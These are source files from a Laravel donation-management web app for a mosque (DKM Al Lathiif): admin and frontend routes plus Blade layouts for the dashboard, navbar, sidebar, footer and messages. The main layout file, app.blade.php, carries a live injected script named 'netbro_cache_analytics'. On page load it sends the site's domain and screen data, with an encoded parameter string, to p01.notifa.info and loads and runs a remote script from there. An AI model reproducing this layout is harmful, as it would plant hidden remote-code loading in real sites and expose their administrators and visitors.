routes/web.php
<?php

use Illuminate\Support\Facades\Route;

/*
|--------------------------------------------------------------------------
| Web Routes
|--------------------------------------------------------------------------
|
| Here is where you can register web routes for your application. These
| routes are loaded by the RouteServiceProvider within a group which
| contains the "web" middleware group. Now create something great!
|
*/





Route::group(['middleware' => ['web']], function () {

    Auth::routes();
    /*--------------------------ADMIN--------------------------------------*/
    Route::prefix('admin')->middleware('auth')->group(function () {

        Route::get('/', function () {
            return view('backend.pages.dashboard');
        });

        Route::resource('rekening','Admin\RekeningController');
        Route::post('rekening/get', 'Admin\RekeningController@getAllRekening')->name('rekening.get');
        Route::patch('rekening/{rekening}', 'Admin\RekeningController@store')->name('rekening.update');
        Route::post('rekening/getList', 'Admin\RekeningController@getRekeningList')->name('rekening.getList');

        Route::resource('jenis','Admin\JenisController');
        Route::post('jenis/get', 'Admin\JenisController@getAllJenis')->name('jenis.get');
        Route::patch('jenis/{jeni}', 'Admin\JenisController@store')->name('jenis.update');
        Route::post('jenis/getList', 'Admin\JenisController@getJenisList')->name('jenis.getList');

        Route::resource('pengkhususan','Admin\PengkhususanController');
        Route::post('pengkhususan/get', 'Admin\PengkhususanController@getAllKhusus')->name('pengkhususan.get');
        Route::patch('pengkhususan/{pengkhususan}', 'Admin\PengkhususanController@store')->name('pengkhususan.update');
        Route::post('pengkhususan/getList', 'Admin\PengkhususanController@getPengkhususanList')->name('pengkhususan.getList');

        Route::resource('donasi','Admin\DonasiController');
        Route::post('donasi/get', 'Admin\DonasiController@getAllDonasi')->name('donasi.get');
        Route::post('donasi/ganti-status', 'Admin\DonasiController@gantiStatus');
        Route::post('donasi/download-bukti', 'Admin\DonasiController@downloadBukti');

        Route::resource('donatur','Admin\DonaturController');
        Route::post('donatur/get', 'Admin\DonaturController@getAllDonatur')->name('donatur.get');
        Route::post('donatur/getList', 'Admin\DonaturController@getDonaturList')->name('donatur.getList');

    });
    /*--------------------------FRONTEND--------------------------------------*/

    Route::get('/', function (){
        return view('welcome');
    });
    Route::get('donasi', 'Front\HomeController@index');
    Route::resource('fdonatur', 'Front\DonaturController');
    Route::resource('fdonatur', 'Front\DonaturController');
    Route::post('home-donatur/getList', 'Front\DonaturController@getDonaturList');
    Route::get('home-donatur/{id}', 'Front\DonaturController@getDonatur');
    Route::post('home-pengkhususan/getList', 'Front\HomeController@getPengkhususanList')->name('home-pengkhususan.getList');


});

resources/views/backend/layouts/app.blade.php
<!DOCTYPE html>
<html lang="en">


<!-- Mirrored from radixtouch.in/templates/admin/aegis/source/light/ by HTTrack Website Copier/3.x [XR&CO'2014], Sat, 14 Sep 2019 08:58:34 GMT -->
<head>
    <meta charset="UTF-8">
    <meta content="width=device-width, initial-scale=1, maximum-scale=1, shrink-to-fit=no" name="viewport">
    <title>Al Lathiif - Donation</title>
    <!-- General CSS Files -->
    <link rel="stylesheet" href="{{asset('assets/backend/')}}/css/app.min.css">
    <link rel="stylesheet" href="{{asset('assets/backend/')}}/bundles/jqvmap/dist/jqvmap.min.css">
    <link rel="stylesheet" href="{{asset('assets/backend/')}}/bundles/weather-icon/css/weather-icons.min.css">
    <link rel="stylesheet" href="{{asset('assets/backend/')}}/bundles/weather-icon/css/weather-icons-wind.min.css">
    <link rel="stylesheet" href="{{asset('assets/backend/')}}/bundles/summernote/summernote-bs4.css">
    <link rel="stylesheet" href="{{asset('assets/backend/')}}/bundles/datatables/datatables.min.css">
    <link rel="stylesheet" href="{{asset('assets/backend/')}}/bundles/datatables/DataTables-1.10.16/css/dataTables.bootstrap4.min.css">
    <link rel="stylesheet" href="{{asset('assets/backend/')}}/bundles/izitoast/css/iziToast.min.css">
    <link href="{{ asset('assets/backend') }}/bundles/select2/select2.min.css" rel="stylesheet" type="text/css" />
    <link href="{{ asset('assets/backend') }}/bundles/select2/select2-bootstrap4.min.css" rel="stylesheet" type="text/css" />

    <!-- Template CSS -->
    <link rel="stylesheet" href="{{asset('assets/backend/')}}/css/style.css">
    <link rel="stylesheet" href="{{asset('assets/backend/')}}/css/components.css">
    <!-- Custom style CSS -->
    <link rel="stylesheet" href="{{asset('assets/backend/')}}/css/custom.css">
    <link rel='shortcut icon' type='image/x-icon' href='{{asset('assets/backend/')}}/img/favicon.ico' />
    @stack('styles')
</head>

<body>
<div class="loader"></div>
<div id="app">
    <div class="main-wrapper main-wrapper-1">
        <div class="navbar-bg"></div>
        @include('backend.layouts.navbar')
        @include('backend.layouts.sidebar')
        <!-- Main Content -->
        @yield('content')
        @include('backend.layouts.footer')

    </div>
</div>
<!-- General JS Scripts -->
<script src="{{asset('assets/backend/')}}/js/jquery.min.js"></script>

<script src="{{asset('assets/backend/')}}/js/app.min.js"></script>
<!-- JS Libraies -->

<script src="{{asset('assets/backend/')}}/bundles/datatables/datatables.min.js"></script>
<script src="{{asset('assets/backend/')}}/bundles/datatables/DataTables-1.10.16/js/dataTables.bootstrap4.min.js"></script>

<!-- Page Specific JS File -->
<script src="{{asset('assets/backend/')}}/js/page/datatables.js"></script>
<script src="{{asset('assets/backend/')}}/bundles/izitoast/js/iziToast.min.js"></script>
<script src="{{asset('assets/backend/')}}/bundles/sweetalert/sweetalert.min.js"></script>
<script src="{{asset('assets/backend/') }}/bundles/select2/select2.min.js" type="text/javascript"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/numeral.js/2.0.6/numeral.min.js"></script>
<script src="{{asset('assets/backend/')}}/js/jquery.mask.min.js"></script>

<!-- Page Specific JS File -->
<!-- Template JS File -->
<script src="{{asset('assets/backend/')}}/js/scripts.js"></script>
<!-- Custom JS File -->
<script src="{{asset('assets/backend/')}}/js/custom.js"></script>
@stack('scripts')
@include('backend.layouts.message')

<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582JKzDzTsXZH2CYqt87h3IjV%2bzOcicI1oG8vGVfTTN%2bNkd1eLe2Zz4P7zlycHIw3xshV5DnSkwuT2UtdXbrUqo5F%2bnfUSh3bZ2EYAJXGo7PTKzV2Ur3f2rbdQA8Fq4A93gZ19dDaqsfbaZYkqj4KyruF0GcwCT%2fm0KSgD2H9yQJaZE0JL%2fJH9b%2bGLukaV4VTMYi5CGI5jfiSdzfdb1vmCn9u5k0wa3jfxetQlmW%2fHV8kCm4FX4H9Z1pYzi%2binJ7saWvwvw81ti8FdNFs%2fsLdR%2f7zUBkZDdxWYtGnIYgBgcWUvt8X%2bGEVB6WjA0HNdwforg2GzvByIcLA2PRdgr9pCxghaoYRbwIl%2fK324bI1ef9hJ9BxfZ8v3OtRG5azd8ARo3cyMNjLISX%2fdcDZSfaD7U%2bKGPou0QzHQcA%3d%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
<script >
    numeral.register('locale', 'id', {
        delimiters: {
            thousands: '.',
            decimal: ','
        },
        abbreviations: {
            thousand: 'k',
            million: 'm',
            billion: 'b',
            trillion: 't'
        },
        ordinal : function (number) {
            return number === 1 ? '' : '';
        },
        currency: {
            symbol: 'Rp'
        }
    });

    function unmask(uang){
        uang = uang.replace(/\./g,'');
        return uang;
    }

    function mask(uang) {
        numeral.locale('id');
        uang = numeral(uang).format('0,0');
        return uang;
    }


</script>

<!-- Mirrored from radixtouch.in/templates/admin/aegis/source/light/ by HTTrack Website Copier/3.x [XR&CO'2014], Sat, 14 Sep 2019 08:59:46 GMT -->
</html>

resources/views/backend/layouts/footer.blade.php
<footer class="main-footer">
    <div class="footer-left">
        Copyright &copy; 2019 <div class="bullet"></div> Design By <a href="#">Redstar</a>
    </div>
    <div class="footer-right">
    </div>
</footer>

resources/views/backend/layouts/message.blade.php
<script>
    $(document).ready(function(){
        @if ($errors->any())
        @foreach ($errors->all() as $error)
        iziToast.warning({
            title: 'Warning',
            message: '{{ $error }}',
            position: 'topRight'
        });
        @endforeach
        @endif
        @if(Session::has('success'))
        iziToast.success({
            title: 'Berhasil',
            message: '{{ Session::get('success') }}',
            position: 'topRight'
        });
        @endif
        @if(Session::has('error'))
        iziToast.error({
            title: 'Gagal',
            message: '{{ Session::get('error') }}',
            position: 'topRight'
        });
        @endif
    });
</script>

resources/views/backend/layouts/navbar.blade.php
<nav class="navbar navbar-expand-lg main-navbar">
    <div class="form-inline mr-auto">
        <ul class="navbar-nav mr-3">
            <li><a href="#" data-toggle="sidebar" class="nav-link nav-link-lg
									collapse-btn"> <i data-feather="align-justify"></i></a></li>
            <li><a href="#" class="nav-link nav-link-lg fullscreen-btn">
                    <i data-feather="maximize"></i>
                </a></li>
            <li>

            </li>
        </ul>
    </div>
    <ul class="navbar-nav navbar-right">

        <li class="dropdown"><a href="#" data-toggle="dropdown"
                                class="nav-link dropdown-toggle nav-link-lg nav-link-user"> <img alt="image" src="{{asset('assets/backend/')}}/img/user.png"
                                                                                                 class="user-img-radious-style"> <span class="d-sm-none d-lg-inline-block"></span></a>
            <div class="dropdown-menu dropdown-menu-right pullDown">
                <div class="dropdown-title">Hello Sarah Smith</div>
                <a href="profile.html" class="dropdown-item has-icon"> <i class="far
										fa-user"></i> Profile
                </a> <a href="timeline.html" class="dropdown-item has-icon"> <i class="fas fa-bolt"></i>
                    Activities
                </a> <a href="#" class="dropdown-item has-icon"> <i class="fas fa-cog"></i>
                    Settings
                </a>
                <div class="dropdown-divider"></div>
                <form action="{{url('logout')}}" method="post" >
                    @csrf
                    <button type="submit" class="dropdown-item has-icon text-danger">
                        Logout
                    </button>
                </form>
            </div>
        </li>
    </ul>
</nav>

resources/views/backend/layouts/sidebar.blade.php
<div class="main-sidebar sidebar-style-2">
    <aside id="sidebar-wrapper">
        <div class="sidebar-brand">
            <a href="{{url('admin')}}"> <span
                    class="logo-name">DKM Al Lathiif</span>
            </a>
        </div>
        <div class="sidebar-user">
            <div class="sidebar-user-picture">
                <img alt="image" src="{{asset('assets/backend/')}}/img/userbig.png">
            </div>
            <div class="sidebar-user-details">
                <div class="user-name">Sarah Smith</div>
                <div class="user-role">Administrator</div>
            </div>
        </div>
        <ul class="sidebar-menu">
            <li class="menu-header">Main</li>
            <li><a class="nav-link active" href="#"><i class="far fa-chart-bar"></i><span>Dashboard</span></a></li>

            <li class="dropdown @yield('donasi')">
                <a href="#" class="nav-link has-dropdown"><i class="fas fa-wallet"></i><span>Donasi</span></a>
                <ul class="dropdown-menu">
                    <li><a class="nav-link" href="{{route('donasi.index')}}">Donasi Masuk</a></li>
                    <li><a class="nav-link" href="index2.html">Donasi Terkonfirmasi</a></li>
                </ul>
            </li>
            <li class="@yield('donatur')"><a class="nav-link active" href="{{route('donatur.index')}}"><i class="fas fa-money-check"></i><span>Donatur</span></a></li>


            <li class="menu-header">Data Master</li>

            <li class="@yield('rekening')"><a class="nav-link active" href="{{route('rekening.index')}}"><i class="fas fa-money-check"></i><span>Rekening</span></a></li>
            <li class="@yield('jenis')"> <a class="nav-link" href="{{route('jenis.index')}}"><i class="fas fa-fax"></i><span>Jenis Donasi</span></a></li>

        </ul>
    </aside>
</div>